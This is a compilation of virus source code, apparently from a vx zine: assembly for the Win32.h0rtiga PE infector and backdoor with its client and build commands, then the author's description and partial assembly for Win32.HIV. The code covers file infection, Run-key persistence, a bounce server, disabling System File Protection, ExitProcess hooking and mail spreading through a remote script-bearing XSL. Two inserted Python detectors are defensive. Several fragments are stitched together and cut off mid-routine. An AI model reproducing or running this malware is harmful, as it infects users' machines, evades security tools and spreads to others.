ddGetSystemDirectoryA dd ?
ddReadFile dd ?
ddWriteFile dd ?
ddSetFilePointer dd ?
ddGetCurrentProcessId dd ?
ddRegisterServiceProcess dd ?
ddGlobalAlloc dd ?
OSVersionInfo _OSVERSIONINFO ?
_maskExe db '*.EXE' , 0
MaxInfeccion equ 6
WinFindData WIN32_FIND_DATA ?
hFicActual dd ?
hCMapActual dd ?
newobject:
oname db ".|Zan", 0, 0, 0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0, 0, 0
objectflags dd 0e0000060h
ObjectTableOffset dd ?
NumObjects dw ?
ObjectAlign dd ?
FileAlign dd ?
ImageSize dd ?
SizeToMap dd ?
OldEntryPointRVA dd ?
hRead dd ?
hWrite dd ?
bytes_rw dd ?
sz_exec db 260 dup (?)
sz_nserver db '\server.exe', 0
addr1 dw 2
dw 0b415h
dd ?
addr2 dw 2
dw 0000h
db 192,168,0,1
sock1 dd ?
sock2 dd ?
gotit dd ?
buffsz equ 4096
adrbuff dd ?
fd_set1 dd 1,0
fd_set2 dd 1,0
fd_set struc
no dd 0
sockh dd 0
fd_set ends
ttl dd 0,64h
semaforo db 0
countbouncer db 0
NumAPISW32 equ 10
sz_mW32 db 'WSOCK32', 0
TablaW32 db 'WSAStartup', 0
db 'socket', 0
db 'bind', 0
db 'listen', 0
db 'accept', 0
db 'connect', 0
db 'send', 0
db 'recv', 0
db 'select', 0
db 'closesocket', 0
addr_apis2:
ddWSAStartup dd ?
ddsocket dd ?
ddbind dd ?
ddlisten dd ?
ddaccept dd ?
ddconnect dd ?
ddsend dd ?
ddrecv dd ?
ddselect dd ?
ddclosesocket dd ?
NumAPISAdv32 equ 3
sz_mAdv32 db 'ADVAPI32', 0
TablaAdv32 db 'RegCreateKeyExA', 0
db 'RegSetValueExA', 0
db 'RegCloseKey', 0
addr_apis3:
ddRegCreateKeyExA dd ?
ddRegSetValueExA dd ?
ddRegCloseKey dd ?
disposition dd ?
KeyHandle dd ?
clase db 'Run', 0
claselen equ $-clase
subkey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
KeyValuelen dd ?
KeyName db 'h0rtiga Server', 0
;------------------------------------------------------------
;end h0rtiga data
;------------------------------------------------------------
GetAPIExpK32: mov edx, esi
@_1: cmp byte ptr [esi], 0
jz @_2
inc esi
jmp @_1
@_2: inc esi
sub esi, edx
mov ecx, esi
xor eax, eax
mov word ptr [ebp + Counter], ax
mov esi, [ebp + kernel]
add esi, 3Ch
lodsw
add eax, [ebp + kernel]
mov esi, [eax + 78h]
add esi, [ebp + kernel]
add esi, 1Ch
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + AddressTableVA], eax
lodsd
add eax, [ebp + kernel]
push eax
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + OrdinalTableVA], eax
pop esi
@_3: push esi
lodsd
add eax, [ebp + kernel]
mov esi,eax
mov edi,edx
push ecx
cld
rep cmpsb
pop ecx
jz @_4
pop esi
add esi,4
inc word ptr [ebp + Counter]
jmp @_3
@_4: pop esi
movzx eax, word ptr [ebp + Counter]
shl eax,1
add eax,dword ptr [ebp + OrdinalTableVA]
xor esi,esi
xchg eax,esi
lodsw
shl eax,2
add eax,dword ptr [ebp + AddressTableVA]
mov esi,eax
lodsd
add eax, [ebp + kernel]
ret
MakeTabla: push esi
call dword ptr [ebp + ddLoadLibraryA]
push ebx
pop ecx
push eax
pop ebx
buki: lodsb
test al, al
jnz buki
MT1: push ecx
push esi
push ebx
call dword ptr [ebp + ddGetProcAddress]
push eax
MT2: lodsb
test al, al
jnz MT2
pop eax
stosd
pop ecx
loop MT1
ret
BuscaHostToInfect:
lea edi, ebp + Counter
xor ax, ax
stosw
lea esi, ebp + WinFindData
push esi
lea esi, ebp + _maskExe
push esi
call dword ptr [ebp + ddFindFirstFileA]
ret
ContinuaBusqueda:
cmp [ebp + Counter], MaxInfeccion
jz CB_end
lea esi, ebp + WinFindData
push esi
push ebx
call dword ptr [ebp + ddFindNextFileA]
ret
CB_end: xor eax, eax
ret
TerminaBusqueda:
push ebx
call dword ptr [ebp + ddFindClose]
ret
Open&Maped_File_RW:
push 0
push 0
push 3h
push 0
push 0
push 80000000h or 40000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMF_error
lea edi, ebp + hFicActual
stosd
push 0
push ebx
push 0
push 4h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMF_error
lea edi, ebp + hCMapActual
stosd
push ebx
push 0
push 0
push 2h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMF_error
ret
OMF_error: push -1
pop eax
ret
Close&UnMaped_File_RW:
push eax
call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz CUF_error
lea esi, ebp + WinFindData.WFD_ftLastWriteTime
push esi
lea esi, ebp + WinFindData.WFD_ftLastAccessTime
push esi
lea esi, ebp + WinFindData.WFD_ftCreationTime
push esi
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddSetFileTime]
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz CUF_error
xor eax, eax
ret
CUF_error: push -1
pop eax
ret
EliminaAtributosFichero:
push 80h
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
RestauraAtributosFichero:
lea esi, ebp + WinFindData.WFD_dwFileAttributes
lodsd
push eax
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
EsInfectable:
push 0
push 0
push 3h
push 0
push 0
push 80000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMFR_error
lea edi, ebp + hFicActual
stosd
push 0
push 0
push 0
push 2h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMFR_error
lea edi, ebp + hCMapActual
stosd
push 0
push 0
push 0
push 4h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMFR_error
push eax
push eax
pop edx
add eax, [edx + 3ch]
cmp word ptr [edx], 'ZM'
jnz NoInfect
cmp word ptr [eax], 'EP'
jnz NoInfect
cmp word ptr [eax + 4ch], 0d00dh
jnz SiInfect
NoInfect: push -1
pop ebx
jmp SNInfect
SiInfect: call CalculaSizeToMap
SNInfect: call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz OMFR_error
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
xchg ebx, eax
ret
OMFR_error: push -1
pop eax
ret
CalculaSizeToMap:
push eax
pop ebx
xchg ebx, edx
xor eax, eax
mov ax, word ptr [edx + 6h]
mov word ptr [ebp + NumObjects], ax
xor eax, eax
add ax, word ptr [edx + 14h]
add eax, 18h
add eax, edx
mov dword ptr [ebp + ObjectTableOffset], eax
push eax
pop esi
xor eax, eax
mov ax, word ptr [ebp + NumObjects]
push SIZEOF_NEWOBJECT
pop ecx
xor edx, edx
mul ecx
add esi, eax
xor edx, edx
add edx, [ebx + 3ch]
add edx, ebx
lea edi, ebp + FileAlign
mov eax, dword ptr [edx + 3ch]
stosd
mov ecx, dword ptr [ebp + FileAlign]
push virlenght
pop eax
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicalsize], eax
mov eax, [esi - SIZEOF_NEWOBJECT + 20]
add eax, [esi - SIZEOF_NEWOBJECT + 16]
mov ecx, dword ptr [ebp + FileAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicaloffset], eax
xchg ebx, eax
lea esi, ebp + physicalsize
lodsd
add ebx, eax
mov dword ptr [ebp + SizeToMap], ebx
ret
InsertaRegistro:
lea esi, ebp + sz_mAdv32
lea edi, ebp + addr_apis3
mov ebx, NumAPISAdv32
call MakeTabla
lea esi, ebp + disposition
push esi
add esi, 4
push esi
push 0
push 0f003fh
push 0
add esi, 4
push esi
push 0
add esi, claselen
push esi
push 80000002h
call dword ptr [ebp + ddRegCreateKeyExA]
test eax, eax
jnz reg_error
lea esi, ebp + KeyHandle
lodsd
xchg eax, ebx
push dword ptr [ebp + KeyValuelen]
lea esi, ebp + sz_exec
push esi
push 1h
push 0
lea esi, ebp + KeyName
push esi
push ebx
call dword ptr [ebp + ddRegSetValueExA]
test eax, eax
jnz reg_error
push ebx
call dword ptr [ebp + ddRegCloseKey]
reg_error: ret
InsertaServidor:
call dword ptr [ebp + ddGetCommandLineA]
push eax
pop esi
lea edi, ebp + sz_exec
ot_bmas: lodsb
stosb
test al, al
jnz ot_bmas
push 0
push 00000080h
push 3
push 0
push 00000001h
push 80000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hRead], eax
push 260
lea ebx, ebp + sz_exec
push ebx
call dword ptr [ebp + ddGetSystemDirectoryA]
test eax, eax
jz errorEx
add eax, ebx
xchg eax, edi
lea esi, ebp + sz_nserver
ot_bmas2: lodsb
stosb
test al, al
jnz ot_bmas2
mov dword ptr [ebp + KeyValuelen], 0
lea esi, ebp + sz_exec
calclenstr: lodsb
inc dword ptr [ebp + KeyValuelen]
test al, al
jnz calclenstr
call InsertaRegistro
push 0
push 00000080h
push 1
push 0
push 0h
push 40000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hWrite], eax
read_again: xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 260
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
test eax, eax
jz errorEx
lea esi, ebp + bytes_rw
lodsd
test eax, eax
jz fdf
xchg eax, ebx
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push ebx
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
test eax, eax
jnz read_again
jz errorEx
fdf: push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 40
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
lea esi, ebp + sz_exec
lodsd
add eax, offsServer
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push ebx
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 92
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 2
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 2
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
lea esi, ebp + hRead
push esi
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz errorEx
lea esi, ebp + hWrite
push esi
call dword ptr [ebp + ddCloseHandle]
errorEx: ret
error: push 0
call dword ptr [ebp + ddExitProcess]
zero_generation:
call GetModuleHandleA
xchg eax, ebx
sub eax, ebx
lea edi, OldEntryPointRVA
stosd
jmp start
f_generation:
push 0
push offset m_szTitle
push offset m_szCopyright
push 0
call MessageBoxA
push 0
call ExitProcess
end zero_generation
;----------------------------------------------------------------------------
; Win32.h0rtiga - end virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin client code (h0rtclient.cpp/Visual C++ 6.0)
;----------------------------------------------------------------------------
#include <iostream.h>
#include <string.h>
#include <stdlib.h>
#include <winsock2.h>
typedef struct {
db accion;
dw puertoremoto;
dd direccion;
} Conf_Remota;
dd addrtmp;
void MostrarCreditos () {
cout << "\n\n\t\t (c) 2000 DeepZone - h0rtiga client (Win32) ...\n\n"
<< "\t\t\tCoded by |Zan - izan@galaxycorp.com\n\n\n"
<< "Uso : h0rtclient <h0rtiga host> <port> <new host> <port>\n"
<< "e.j.: h0rtclient host.com 5556 www.pandasoftware.es 80\n\n";
cout.flush();
cremota->accion = acc;
cremota->direccion = dire;
cremota->puertoremoto = premote;
int s, i;
char banner[MAX_BANNER];
sockaddr_in a;
hostent FAR *h = NULL;
WSADATA wsaData;
Conf_Remota conf_remota;
// Show credits
MostrarCreditos();
// Num params ?
if (argc != 5) {
// WinSock up!!
// server's name
if (isalpha((int)*(argv[1]))) {
h = gethostbyname(argv[1]);
if (h == NULL) {
cout << "Error : No se puede hallar el nombre del anfitrion\n\n";
WSACleanup();
exit(-1);
else {
if ((a.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) {
}
}
// port ?
a.sin_family = AF_INET;
a.sin_port = htons((dw)atoi(argv[2]));
if (s==0) {
// trying ...
// clean banner
else {
if (isalpha((int)*(argv[3]))) {
h = gethostbyname(argv[3]);
if (h == NULL) {
cout << "Error : No se puede hallar nombre de anfitrion remoto\n\n";
WSACleanup();
exit(-1);
else {
if ((addrtmp = inet_addr (argv[3])) == INADDR_NONE) {
}
}
closesocket(s);
// WinSock down !!
WSACleanup();
}
;----------------------------------------------------------------------------
; Win32.h0rtiga - end client code (h0rtclient.cpp)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - compiling ... (Tasm 5.0/x86)
;----------------------------------------------------------------------------
;
; tasm32 -ml w32h0rtiga.asm
; tlink32 -Tpe -c -x w32h0rtiga.obj ,,, import32
; pewrsec.com w32h0rtiga.exe
;
;
; --] EOF
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HIV.ASM]ÄÄÄ
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win32.HIV ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Finally I finished this virus... it took me more than 8 months to code it.
I hope you will like it and enjoy the new features it presents.
Here comes a detailed description of Win32.HIV...
Direct action:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus infects ALL PE filez (also inside MSI filez) in the current directory.
Infection of PE filez is done by appending to the last section. Infection of
PE filez inside MSIs is done by a cavity algorithm: into these PE filez not
the whole virus is copied, but only a small chunk of code, which after
execution displays a message and jumps back to the host. This can be called
a payload.
EntryPoint Obscuring:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yeah, this virus also uses EPO, which means the virus doesn't modify the
entry point; it is executed "in the middle" of the host program's execution.
Again, this is a trick to fool heuristic analysis :)
It overwrites a procedure's epilog with a <jmp virus> instruction. The epilog
(the five bytes that end_host writes back, 0C95B5E5Fh followed by 0C3h) loox
like:
    5F          pop     edi
    5E          pop     esi
    5B          pop     ebx
    C9          leave
    C3          ret
Even if the sequence can't be found it still infects the file - this will take
AVerz some time to understand :)
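The epilog patch above, as an added example that is not part of Win32.HIV or of this zine: a byte-level heuristic that finds E9 jmps in a code section whose target leaves that section and lands in the last section, the place an appending infector keeps its body, together with the restore step that end_host performs. The code section, its RVA 1000h and the last-section RVA 5000h / size 4000h are constructed values; for a real file they come from its section table. An E9 byte inside data or inside another instruction's operand produces a false hit, so a real scanner would decode instruction boundaries first.

```python
"""Heuristic for the EPO trick described above. Win32.HIV overwrites a
procedure epilog with a 5-byte "jmp virus" (E9 rel32); end_host restores
0C95B5E5Fh,0C3h = 5F 5E 5B C9 C3 = pop edi / pop esi / pop ebx / leave / ret.
Added example, not HIV's own code. The code section and RVAs below are
constructed; for a real file take them from its section table."""
import struct

EPILOG = bytes.fromhex("5F5E5BC9C3")   # pop edi; pop esi; pop ebx; leave; ret


def find_relative_jumps(code, code_rva):
    """Yield (offset, target_rva) for every E9 rel32 opcode in the buffer.
    Linear byte scan: an E9 inside data or an operand is a false hit."""
    for off in range(len(code) - 4):
        if code[off] == 0xE9:
            rel = struct.unpack_from("<i", code, off + 1)[0]
            yield off, (code_rva + off + 5 + rel) & 0xFFFFFFFF


def suspicious_epo_jumps(code, code_rva, last_rva, last_size):
    """jmps that leave the code section and land in the last section, where
    an appending infector keeps its body. Returns [(offset, target_rva)]."""
    hits = []
    for off, target in find_relative_jumps(code, code_rva):
        in_code = code_rva <= target < code_rva + len(code)
        in_last = last_rva <= target < last_rva + last_size
        if in_last and not in_code:
            hits.append((off, target))
    return hits


def restore_epilog(code, off):
    """Disinfection step matching end_host: put the known epilog bytes back."""
    patched = bytearray(code)
    patched[off:off + 5] = EPILOG
    return bytes(patched)


def build_code(infected, code_rva=0x1000, virus_rva=0x5000):
    """Constructed .text contents: two tiny functions with the standard
    epilog. infected=True overwrites the first epilog with jmp virus_rva,
    which is what the description says HIV does."""
    func = bytes.fromhex("55 8BEC 53 56 57 90 90 90") + EPILOG   # prolog, body, epilog
    code = bytearray(func + func)
    if infected:
        off = code.index(EPILOG)
        rel = virus_rva - (code_rva + off + 5)     # rel32 is relative to the next insn
        code[off:off + 5] = b"\xE9" + struct.pack("<i", rel)
    return bytes(code)


if __name__ == "__main__":
    code = build_code(True)
    hits = suspicious_epo_jumps(code, 0x1000, last_rva=0x5000, last_size=0x4000)
    for off, target in hits:
        print("jmp at .text+%#x -> RVA %#x (leaves .text, lands in last section)"
              % (off, target))
    assert restore_epilog(code, hits[0][0]) == build_code(False)
```

A jmp whose target stays inside the code section is not reported, which keeps ordinary intra-section control flow out of the results; only the combination "leaves the code section" and "lands in the last section" is flagged.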
Multi-process residency:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This virus is multi-process resident, which means it can become resident in
ALL processes in the system, not only in the current one. Virus does:
Very efficient! Imagine - you have WinCommander running and accidentally you
execute the virus. The virus becomes resident in ALL processes, including
WinCommander, so every file manipulation will be caught by the virus. If you
open any file under WinCommander, the virus will infect it! :)
The infection runs in a separate thread and execution is passed to the host
code, so you should not notice any system slowdown. Also, the ExitProcess API
is hooked, so the process can only be terminated once the infection is finished.
SFC stuff:
ÄÄÄÄÄÄÄÄÄÄÄ
All Win2k-compatible infectorz used the SfcIsFileProtected API to check if
victim files r protected by the system and, if so, didn't infect them. This
infector can disable SFC under Win98/2k/ME, so ALL filez (even the system ones)
can be infected! I would like to thank Darkman for his ideaz and SFC code.
Mail spreading:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus finds in the registry the location of the default address book file
of Outlook Express, gets 5 mail addresses from there and sends them an infected
XML document (see below).
<?xml version="1.0"?>
<?xml:stylesheet type="text/xsl" href="http://coderz.net/benny/viruses/press.txt"?>
<i>This cell has been infected by HIV virus, generation: XXXXXXXXXX</i>
press.txt is an XSL (XML stylesheet), which is loaded together with the XML
file and can be placed anywhere on the internet. This XSL contains VBScript
which will infect the computer. The XML loox clean - in fact, it is, but it
uses a template which is infected. I l0ve this stuff...:-)
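The XML document quoted above, as an added example that is not part of Win32.HIV or of this zine: a check that pulls the stylesheet processing instruction out of an XML file and reports an href that points at another host, which is where the script in this trick actually lives. The generation number in the sample is made up. The expat parser is created without a namespace separator so that the colon in the non-standard xml:stylesheet target (the form the virus writes) is treated as an ordinary name character.

```python
"""Check for the trick described above: an XML document that is clean by
itself but pulls an XSL stylesheet from a remote host through an
<?xml:stylesheet?> processing instruction. Added example, not part of
Win32.HIV; the sample document is the one quoted in the description with a
constructed generation number."""
import re
from xml.parsers import expat

SAMPLE_XML = ('<?xml version="1.0"?>'
              '<?xml:stylesheet type="text/xsl" href="http://coderz.net/benny/viruses/press.txt"?>'
              '<i>This cell has been infected by HIV virus, generation: 0000000001</i>')

# pseudo-attributes of a stylesheet PI: name="value" or name='value'
_PSEUDO_ATTR = re.compile(r"""([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "//", "\\\\")


def stylesheet_pis(xml_text):
    """Return [(type, href)] for every stylesheet processing instruction.
    No namespace_separator: the colon in 'xml:stylesheet' is then just a
    name character, so the target the virus writes parses as a PI."""
    found = []

    def on_pi(target, data):
        if target.lower() in ("xml-stylesheet", "xml:stylesheet"):
            attrs = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
                     for m in _PSEUDO_ATTR.finditer(data)}
            found.append((attrs.get("type", ""), attrs.get("href", "")))

    parser = expat.ParserCreate()
    parser.ProcessingInstructionHandler = on_pi
    parser.Parse(xml_text, True)
    return found


def remote_stylesheets(xml_text):
    """hrefs that would make the XML processor fetch the stylesheet, and any
    script it carries, from somewhere other than the document itself."""
    return [href for _type, href in stylesheet_pis(xml_text)
            if href.lower().startswith(REMOTE_PREFIXES)]


if __name__ == "__main__":
    for href in remote_stylesheets(SAMPLE_XML):
        print("remote stylesheet:", href)
```

A document with no stylesheet PI, or one whose href is a relative path, yields an empty list; only an absolute, network-reachable href is reported, since that is the part of the document that makes it dangerous.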
NTFS stuff:
ÄÄÄÄÄÄÄÄÄÄÄÄ
The virus compresses infected filez placed on NTFS, so the infected filez
are usually smaller than the clean copies... the user should not notice any
space eating...;) Also, it contains another payload - using file streamz on
NTFS. Every infected file on NTFS will have a new stream ":HIV" containing
the message "This cell has been infected by HIV virus, generation: " + the
10-character number of the virus generation in decimal format.
Anti-*:
ÄÄÄÄÄÄÄÄ
Yeah, the virus uses some anti-* featurez: against debuggerz (check the
"debug_stuff" procedure), against heuristics (SALC opcode, non-suspicious
code, EPO) and against AVerz (infected PE files grow by 16384 bytes, of which
about 6.5 kB is virus code; the rest is data from the end of the host, so if
you open the file and go to EOF you will not find any virus :)
Other features:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The virus doesn't check the extensions of victim files; it just opens the file
and chex the internal format to see if the file is suitable for infection.
Also, the bug can correct the checksum of an infected file (if needed), so
there should not be any problem with infecting some files under WinNT/2k.
Known bugz:
ÄÄÄÄÄÄÄÄÄÄÄÄ
Here I would like to thank Perikles and Paddingx for beta-testing Win32.HIV.
I tried to fix all possible bugz, but no program is bug-free, right? :P
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Some comments ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
That was the short description of the virus. I was coding it for a very long
time, since the winter of 2000, right after Win2k.Installer was released. My
idea was to code a virus which could defeat the OS "immunity". Heh, and becoz
the HIV virus does the same to the human body, I decided to name my virus so.
This virus went through all my personal problems and happiness with me. This
year my life was like a rollercoaster. Once up, once down. Everything important
that happened to me... this virus was there with me... I'm glad that I finished
it, but I also feel great nostalgia.
Well, I would like to greet some of my friends that helped me or just were
with me and created a good atmosphere all year.
Darkman: That's a pity that we couldn't code next common virus. However,
thnx for yer help, yer moral support and everything... come
back to vx!
GriYo & Maia: It was really wonderful time in Brno. I'm glad that you came.
Just say weeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed :)
Rajaat: Many many many thnx for the atmosphere you created on our
meeting... I really enjoyed it. Shroomz 4ever! :) btw, I want
those CDs of Timothy Leary and Kate Bush :-)
Ratter: Don't think you are, know you are!
Skag: Psychedelic drugz rulez :P
Perikles: Thanx for beta-testing dude!
Paddingx: ----------- " " ------------
GigaByte: Very nice time in Brno... but'ta... next time: speak slowly :)
Lada: Rather yes than ratter no :-) Thnx for the best holidayz I've
ever had.
Petra: H3y4, y4 g0t v3ry nIc3 b0dy :)
Queenie: /me hugs ya :D
Timothy Leary: Hey man, ya rule, yer death is the biggest lost for the world
in this age...
;now we will hook ExitProcess API of host program so host program could
;be terminated only when virus thread will finish its action
lea eax,[ebp + newExitProcess - gdelta] ;address of new handler
sub eax,[ebp + image_base - gdelta] ;correct it to RVA
push eax ;save it
push 040F57181h ;CRC32 of ExitProcess
mov eax,400000h ;image base of host file
image_base = dword ptr $-4
call patch_IT ;hook API
test eax,eax
je end_host ;quit if error
mov [ebp + oldExitProcess - gdelta],eax ;save old address
;now we will create thread which will try to infect all K32s in all
;processes - multi-process residency
call _tmp
tmp dd ? ;temporary variable
_tmp: xor eax,eax
push eax
push ebp
lea edx,[ebp + searchThread - gdelta]
push edx
push eax
push eax
call [ebp + a_CreateThread - gdelta] ;create new thread
xchg eax,ecx
jecxz end_host ;quit if error
push eax
call [ebp + a_CloseHandle - gdelta] ;close its handle
end_host:
@SEH_RemoveFrame ;remove SEH frame
mov edi,[esp.cPushad] ;get EPO address (*)
mov eax,0C95B5E5Fh ;restore host code
stosd ;...
mov al,0C3h ;...
stosb ;...
popad ;restore all registers
ret ;and jump back to host
push edi
add edi,eax
call @sfcme
db '\SYSTEM\sfp\sfpdb.sfp',0 ;store the path
@sfcme: pop esi
push 22
pop ecx
rep movsb
pop ebx
call Create_FileA ;open the file
inc eax
je end_seh
dec eax
xchg eax,esi
push 0
push esi
call [ebp + a_GetFileSize - gdelta] ;get file size to EDI
xchg eax,edi
mov [ebp + sfcme_size - gdelta],edi ;save it
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push edi
push 0
call [ebp + a_VirtualAlloc - gdelta] ;allocate buffer for file
test eax,eax
je sfcme_file
xchg eax,ebx ;address to EBX
push 0
lea eax,[ebp + tmp - gdelta]
push eax
push edi
push ebx
push esi
call [ebp + a_ReadFile - gdelta] ;read file content to our buffer
find_comma:
lodsb ;load byte
stosb ;store it
dec ecx ;decrement counter
cmp al,','
jne find_comma ;find comma
find_cr:dec esi
lodsw
dec ecx
cmp ax,0A0Dh
jne find_cr ;find CRLF sequence
mov eax,0A0D2C2Ch
stosd ;save commas and CRLF
inc ecx
loop find_comma ;do it in a loop
pop eax ;get base address of buffer
sub edi,eax ;EDI - size of data
mov [esp.Pushad_eax],edi ;save it
popad ;restore all registerz
push eax ;store size to stack
xor eax,eax
push eax
push eax
push eax
push esi ;move to beginning of file
call [ebp + a_SetFilePointer - gdelta]
pop ecx
push 0
lea eax,[ebp + tmp - gdelta]
push eax
push ecx
push ebx
push esi
call [ebp + a_WriteFile - gdelta] ;write modified data (unprotect
push esi ;filez under WinME :-)
call [ebp + a_SetEndOfFile - gdelta] ;set EOF
push MEM_DECOMMIT
push 12345678h
sfcme_size = dword ptr $-4
push ebx
call [ebp + a_VirtualFree - gdelta]
push MEM_RELEASE
push 0
push ebx
call [ebp + a_VirtualFree - gdelta] ;release buffer memory
jmp sfcme_file ;close file and quit
sfc_stuffME EndP
push esi
call [ebp + a_SetEndOfFile - gdelta] ;truncate file
sfcme_file:
push esi
call [ebp + a_CloseHandle - gdelta] ;close file
jmp end_seh ;and quit
sfc_stuff98 EndP
mov ebx,[ecx.MZ_lfanew]
add ebx,ecx ;move to PE header
movzx edx,word ptr [ebx.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edx,[edx+ebx+(3*IMAGE_SIZEOF_FILE_HEADER+4)]
;get to second section header
cmp [edx],'tad.' ;must be ".data"
jne end_sfile
cmp byte ptr [edx+4],'a'
jne end_sfile
sfc_parse:
and dword ptr [esi],0 ;nulify everything in that
lodsd ;section
sub ecx,3 ;correct counter
loop sfc_parse ;do it ECX-timez
end_sfile:
push 12345678h
lpsFile = dword ptr $-4
call [ebp + a_UnmapViewOfFile - gdelta];unmap view of file from
end_smfile: ;our address space
push 12345678h
hsMapFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close handle of mapping object
end_scfile:
lea eax,[ebp + WFD.WFD_ftLastWriteTime - gdelta]
push eax
lea eax,[ebp + WFD.WFD_ftLastAccessTime - gdelta]
push eax
lea eax,[ebp + WFD.WFD_ftCreationTime - gdelta]
push eax
push dword ptr [ebp + hsFile - gdelta]
call [ebp + a_SetFileTime - gdelta] ;set back file time
push 12345678h
hsFile = dword ptr $-4
call [ebp + a_CloseHandle - gdelta] ;close file
end_sfc:push 12345678h
find_handle = dword ptr $-4
